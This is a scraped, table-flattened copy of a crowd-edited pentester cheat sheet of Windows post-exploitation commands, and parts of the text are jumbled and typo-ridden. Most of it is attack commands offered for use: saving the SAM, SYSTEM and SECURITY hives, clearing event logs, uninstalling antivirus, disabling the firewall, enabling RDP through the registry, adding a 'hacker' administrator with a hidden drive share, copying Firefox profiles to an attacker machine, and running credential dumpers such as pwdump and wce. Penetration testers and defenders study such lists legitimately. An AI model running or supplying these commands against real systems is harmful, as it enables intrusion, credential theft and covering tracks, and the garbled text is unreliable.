Windows Post-Exploitation Command List

If for any reason you cannot access/edit these files in the future, please contact mubix@hak5.org You can download these files in any format using Google Doc’s File>Download As method If you are viewing this on anything other than Google Docs then you can get access to the latest links to the Linux/Unix/BSD, OSX, Obscure, Metasploit, and Windows docs here: http://bit.ly/nuc0N0 DISCLAIMER: Anyone can edit these docs, and all that entails and implies

net share Windows Post Exploitation Command List - Page: 1

net file

Table of Contents Table of Contents Blind Files Non Interactive Command Execution System Networking (ipconfig, netstat, net) Configs Finding Important Files Files To Pull (if possible) Remote System Access Auto-Start Directories WMI Reg Command Deleting Logs Uninstalling Software “AntiVirus” (Non interactive) # Other (to be sorted) OS SPECIFIC Win2k3 Vista/7 Vista SP1/7/2008/2008R2 (x86 & x64) Invasive or Altering Commands Support Tools Binaries / Links / Usage Third Party Portable Tools Useful Meterpreter Post Modles Useful Multi-Step Techniques Table of Contents Blind Files Non Interactive Command Execution System Networking (ipconfig, netstat, net) Configs Finding Important Files Files To Pull (if possible) Remote System Access Auto-Start Directories WMI

net share Windows Post Exploitation Command List - Page: 2

net file

Reg Command Deleting Logs Uninstalling Software “AntiVirus” (Non interactive) # Other (to be sorted) OS SPECIFIC Win2k3 Vista/7 Vista SP1/7/2008/2008R2 (x86 & x64) Invasive or Altering Commands Support Tools Binaries / Links / Usage Third Party Portable Tools Useful Meterpreter Post Modules Useful Multi-Step Techniques net share Windows Post Exploitation Command List .Page: 3 net file .

Files that will have the same name across networks / Windows domains / systems. It stores users' passwords in a hashed format (in LM hash and NTLM hash). This is another file to look for if boot.ini %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\con fig\RegBack\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\con fig\RegBack\system >insert new rows above this line< SEE IMPORTANT FILES SECTION FOR MORE IDEAS Non Interactive Command Execution q net share Windows Post Exploitation Command List . File %SYSTEMDRIVE%\boot. %WINDIR%\win.Blind Files (Things to pull when all you can do is to blindly read) LFI/Directory traversal(s).ini Expected Contents / Description A file that can be counted on to be on virtually every windows host.ini isn’t there or coming back. Helps with confirmation that a read is happening. which is some times the case.Page: 4 net file .

session id. however shall be present in Windows NT 6. USERNAME. groups current user is a member of and their sids as well as current privilege level. network interface config.0-6. and binary name. /CONNECT can be added. login mqappsrvethod. but usually not. Specific ones to look for are USERDOMAIN. Not present in all versions of Windows. LOGONSERVER. time zone. including hostname. domain. whoami /all set systeminfo (XP+) Outputs a large amount of data about the sytem. Shows all current environmental variables. It has username. Lists current user. sid. qwinsta (2000/NT4 with Terminal Services.System Command whoami Expected Output or Description Lists your current user. COMPUTERNAME. logon server. but a bit easier to read.Page: 5 net file . USERPROFILE. lists Terminal Services servers net share Windows Post Exploitation Command List . and ALLUSERPROFILE. pid. and hotfixes installed Displaying information about RDP sessions. APPDATA.1. HOMEPATH. XP and above) qprocess * Much like tasklist. needed to gain the information you need.

Using the keyname you achieved from ‘getkeyname’. and more. you can query the status. Outputs the list of services in verbose csv format. Each user can have their own scheduled tasks now.at Shows currently scheduled tasks via ‘at’. Domain. Even though schtasks is the new way of doing things admin wise. net time net file net session net use Used to map network shares. tasklist net share Windows Post Exploitation Command List . Good for throwing in temp and pulling down for a more closer look. Workgroups. Lists all the currently scheduled tasks that your current user has access to see. pid and other information about the service. Username (of the user executing this command). such as the C:\ drive. the full computer name. Lists services schtasks (XP+) schtasks /query /fo csv /v > %TEMP% net start ORn sc query -> sc getkeyname “XXXXX” --> sc queryex “XXXXX” net config workstation You can use the name you got from ‘net start’ to get the ‘key name’ of the service you want more information on.Page: 6 net file . This is the big deviation from ‘at’. pentesters can still use ‘at’ to get system level shells even through Win7x64 systems. This will display information such as NetBIOS name.

Networking (ipconfig.tasklist (XP+) tasklist /m or tasklist / m blah. but it list the current drives on the system. though visible as console output instead with PID’s too. net) Command ipconfig /all ipconfig /displaydns netstat -nabo Expected Output or Description Displays the full information about your NIC’s. net share Windows Post Exploitation Command List . dll. or if a module is specified then tasklist will only list the processes with that specific module running. Locates insecurely registered executables within the system registry on Windows 7. Displays your local DNS cache. Great for finding processes running crypto or other specific function dlls Lists processes and their accompanying service keyname if they are parented by a service Kill processes by name or pid (with force option) tasklist /svc taskkill [/f] /pid <pid> taskkill [/f] /im <image_name> fsutil fsinfo drives reg query HKLM /s / d /f "C:\* *. Lists all of the ‘modules’ (binary (exe. netstat. com or any other PE based code that was executed) for each psportsportrocess.Page: 7 net file .exe" | find / I "C:\" | find /V """" Must be an administrator to run this.dll Is equivalent to using Taskmanager.

If you are a local user then you just drop the /domain. Prints the password policy for the domain Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup.netstat -s -p [tcp|udp| icpm|ip] netstat -r netstat -na | findstr :445 netstat -nao | findstr LISTENING netstat -nao | findstr LISTENING netstat -na | findstr LISTENING netsh diag show all net view net view /domain net view / domain:otherdomain net user %USERNAME% / domain net user /domain net accounts net accounts /domain Pulls information on the current user. XP and up for -o flag to get PIDnet acc XP and up for -o flag to get PID net share Windows Post Exploitation Command List . logon scripts. Important things to note are login times. and group membership Lists all of the domain users Prints the password policy for the local system.Page: 8 net file . if they are a domain user. This can be different and superseded by the domain policy. last time changed password.

this actually another way of getting *current* domain admins Prints the members of the Domain Admins group Prints the members of the Enterprise Admins group Prints the list of Domain Controllers for the current domain Displays your currently shared SMB entries. and what path(s) they point to.Page: 9 net file . This can be good for finding other networks and static routes that have been put in place browstat (Not working on XP) ● http://www.net localgroup administrators net localgroup administrators /domain net group “Domain Admins” /domain net group “Enterprise Admins” /domain net group “Domain Controllers” /domain nbtstat -a [ip here] net share net session | find / “\\” arp -a route print Prints the members of the Administrators local group as this was supposed to use localgroup & domain. Lists all the systems currently in the machine’s ARP table.securityaegis. Prints the machine’s routing table.com/ntsd-backdoor/ net share Windows Post Exploitation Command List .

Page: 10 net file .txt Description / Reason Prints a directory listing in ‘tree’ format. but it’s good to know for sure. Usually going to be cmd. The /a makes the tree printed with ASCII characters instead of special ones and the / f displays file names as well as folders net share Windows Post Exploitation Command List . echo %COMSPEC% Finding Important Files Command tree C:\ /f /a > C:\output_of_tree.exe in the Windows directory.Configs Command gpresult /z Expected Output or Description Extremely verbose output of GPO (Group policy) settings as applied to the current system and user sc qc sc query sc queryex type %WINDIR%\System32\drivers\etc\h osts dir %PROGRAMFILES% Print the contents of the Windows hosts file Prints a diretory listing of the Program Files directory.

for ‘searchstring’ anywhere in the file name or path. usually lots of good information can be pulled.log %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software net share Windows Post Exploitation Command List . Counts the lines of whatever you use for ‘command’ command | find /c /v “” Files To Pull (if possible) File location %SYSTEMDRIVE%\pagefile.Page: 11 net file . but contains spill over from RAM.sys Description / Reason Large file. but should be a last resort due to size %WINDIR%\debug\NetSetup.dir /a dir /b /s [Directory or Filename] dir \ /s /b | find / I “searchstring” Searches the output of dir from the root of the drive current drive (\) and all sub drectories (/s) using the ‘base’ format (/b) so that it outputs the full path for each listing.

sav %WINDIR%\system32\config\security.log %USERPROFILE%\ntuser.sav %WINDIR%\system32\config\system.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.log %SystemDrive%\inetpub\logs\LogFiles %WINDIR%\system32\logfiles\w3svc1\exYYMMDD.Page: 12 net file .sav %WINDIR%\system32\CCM\logs\*.dat %WINDIR%\System32\drivers\etc\hosts IIS 6 error log IIS 7’s logs location Remote System Access net share Windows Post Exploitation Command List .Evt %WINDIR%\system32\config\SecEvent.log (year month day) %WINDIR%\system32\config\AppEvent.IE5\index.log (5.sav %WINDIR%\system32\config\software.Evt %WINDIR%\system32\config\default.%WINDIR%\repair\security %WINDIR%\iis6. 6 or 7) %WINDIR%\system32\logfiles\httperr\httperr1.

This is less helpful as most commands will automatically make this connection if needed Using the IPC$ mount use a user name and password allows you to access commands that do not usually ask for a username and password as a different user in the context of the remote system. This is useful when you’ve gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on. net use \\computername / user:DOMAIN\username password reg add "HKEY_LOCAL_MACHI NE\SYSTEM\CurrentControl Set\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Enable remote desktop. net share Windows Post Exploitation Command List .Command net share \\computername tasklist /V /S computername qwinsta / SERVER:computername qprocess / SERVER:computername * net use \\computername Description / Reason This maps IPC$ which does not show up as a drive but allows you to access the remote system as the current user.Page: 13 net file .

like uname on *nix) %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\ %SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\ %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\ Windows NT 6. 3.0 Windows NT 5.1. This will remove any IPC$ connection after it is done so if you are using another user.Page: 14 net file .50 net share Windows Post Exploitation Command List . 5.reg add "HKEY_LOCAL_MAC HINE\SYSTEM\CurrentCo ntrolSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f Enable remote assistance ● ● ● net time \\computername (Shows the time of target computer) dir \\computername\share_or_admin_share\ (dir list a remote directory) tasklist /V /S computername ○ Lists tasks w/users running those tasks on a remote system.0. you need to re-initiate the IPC$ mount Auto-Start Directories ● ver (Returns kernel version . 5.1.51.2. 6. 3.0 Windows 9x Windows NT 4.

hive (Save system hive to a file) reg save HKLM\SAM sam. size. sid.WMI ● ● ● ● ● ○ ● ● ● ● ● ● ● ● ● wmic bios wmic qfe wmic qfe get hotfixid (This gets patches IDs) wmic startup wmic service wmic osuseraco wmic process get caption. filesystem.hive (Save security hive to a file) reg save HKLM\System system. volumeserialnumber (hard drive information) wmic useraccount (usernames.commandline wmic process call create “process_name” (executes a program) wmic process where name=”process_name” call terminate (terminates program) wmic logicaldisk where drivetype=3 get name.hive (Save sam to a file)= reg add [\\TargetIPaddr\] [RegDomain][ \Key ] reg export [RegDomain]\[Key] [FileName] reg import [FileName ] reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values ) net share Windows Post Exploitation Command List . freespace.Page: 15 net file .executablepath. systemname. and various security related goodies) wmic useraccount get /ALL wmicwmic share get /ALL (you can use ? for gets help ! ) wmic startup list full (this can be a huge list!!!) wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target) Reg Command exit ● ● ● ● ● ● ● reg save HKLM\Security security.

exe <script js/vbs/c#> xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.dll. LockWorkStation (locks the screen -invasive-) wscript.) pkgmgr /iu:”TelnetClient” (Client ) rundll32.exe <script js/vbs> cscript.exe user32...log /a /s /q /f Uninstalling Software “AntiVirus” (Non interactive) ● ● wmic product get name /value (this gets software names) wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software) # Other (to be sorted) ● ● ● ● ● ● ● pkgmgr usefull /iu :”Package” pkgmgr usefull /iu :”TelnetServer” (Install Telnet Service .sqlite \\your_box\firefox_funstuff OS SPECIFIC Win2k3 ● winpop stat domainname Vista/7 net share Windows Post Exploitation Command List .Deleting Logs ● ● ● wevtutil el (list logs) wevtutil cl <LogName> (Clear specific lowbadming) del %WINDIR%\*.Page: 16 net file .

exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature / featurename:TFTP To disable a feature (again TFTP client): ● %windir%\System32\cmd.Page: 17 net file .● ● ● ● ● winstat features wbadmin get status wbadmin get items gpresult /H gpols.htm bcdedit /export <filename> Vista SP1/7/2008/2008R2 (x86 & x64) Enable/Disable Windows features with Deployment Image Servicing and Management (DISM): *Note* Works well after bypassuac + getsystem (requires system privileges) *Note2* For Dism. the long commands are necessary To list features which can be enabled/disabled: ● %windir%\System32\cmd.exe" /online /disable-feature / featurename:TFTP Invasive or Altering Commands These commands change things on the target and can lead to getting detected Command net user hacker hacker / add Description Creats a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’ net share Windows Post Exploitation Command List .exe /c "%SystemRoot%\system32\Dism.exe to work on x64 systems.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features To enable a feature (TFTP client for example): ● %windir%\System32\cmd.

One thing to note is that in newer (will have to look up exactly when.FULL / unlimited Adds the new user ‘hacker’ to the local administrators group Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access. I believe since XP SP2) windows versions. or modify anything on that drive.net localgroup administrators /add hacker or net localgroup administrators hacker / add net share nothing$=C:\ /grant:hacker. If rules are not in place for your connection. this could cause you to loose it. Disables the local windows firewall Enables the local windows firewall. but still puts up a red flag if those accounts are being watched.Page: 18 net file . Support Tools Binaries / Links / Usage Command Link to download Description net share Windows Post Exploitation Command List . This can useful for re-enabling old domain admins to use. share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind net user username / active:yes /domain netsh firewall set opmode disable netsh firewall set opmode enable Changes an inactive / disabled account to active.

Third Party Portable Tools (must be contained in a single executable) REMEMBER: DO NOT RUN BINARIES YOU HAVEN’T VETTED .html PwDump7.org/security/pwdump_7/ net share Windows Post Exploitation Command List .exe > ntlm.txt http://www.net/carrot-exe.Page: 19 net file .BINARIES BELOW ARE NOT BEING VOUCHED FOR IN ANY WAY AS THIS DOCUMENT CAN BE EDITED BY ANYONE Command carrot.ackack.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp / dialup /pwdump Link to download http://h.tarasco.

nirsoft.net/utils/nircmd.Page: 20 net file .dc=com -f "objectClass=user" sn givenName samaccountname -nodn -adcsv > exported_users.csv http://www.exe http://www.com/research/wce_v adfind.html wce.joeware.ampliasecurity.http://www.dc=example.exe -b ou=ActiveDirectory.net/freetools/ net share Windows Post Exploitation Command List .

com\tools\all_binaries\fgdump.Various tools (e.exe) Some examples of protocols in use: http://hackarmoury.com svn://hackarmoury.com svn://hackarmoury.com http://ipv6.g.hackarmoury.Page: 21 net file .com/tools \\hackarmoury.com (IPv6 ONLY) net share Windows Post Exploitation Command List .com\tools ftp://hackarmoury. \\hackarmoury.

Page: 22 net file .net share Windows Post Exploitation Command List .

Sign up to vote on this title
UsefulNot useful